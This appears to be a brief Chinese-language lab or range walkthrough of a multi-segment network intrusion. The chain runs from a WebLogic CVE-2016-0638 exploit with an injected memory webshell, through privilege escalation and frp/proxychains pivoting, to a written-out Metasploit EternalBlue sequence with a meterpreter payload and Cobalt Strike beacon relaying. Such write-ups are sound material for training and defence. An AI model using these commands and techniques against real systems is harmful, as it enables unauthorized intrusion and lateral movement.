https://pan.baidu.com/s/1DtOdje33JeoF8kcU6LBqSw?pwd=g5r4
dc 区段1
pc 区段2 区段1
web nat 区段1
外网
ms17010 是打不通的
有服务要手动起来,,,,
mssql 1qaz@WSX
登录启动 weblogic
疑似存在漏洞
存在cve20160638
直接注入内存马
使用哥斯拉连接成功
我们现在是低权
靶机里面有360,但是cs直接生成的检测不出来。(搞了半天免杀还失败了【晕】
尝试提权,获取到了 system
ipconfig /displaydns
查看dns缓存
pc icmp探测是不行的,dns才能探测到
上传运行 frp(过程略)
端口扫描 可以用插件或者
proxychains nmap -A -F -sT -Pn 10.10.10.10
第二层上线cs
17010打进去用frp代理
1
2
3
4
5
6
set Proxies socks5:127.0.0.1:60000
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.10.10.10
set lport 4444
run
现在跳板机上面监听端口,
配置一个端口就可以,
生成shell,监听跳板机监听的端口,cs会自动转发流量
通过上面msf 获取的system,我们直接木马即可
cs 会同步 上线
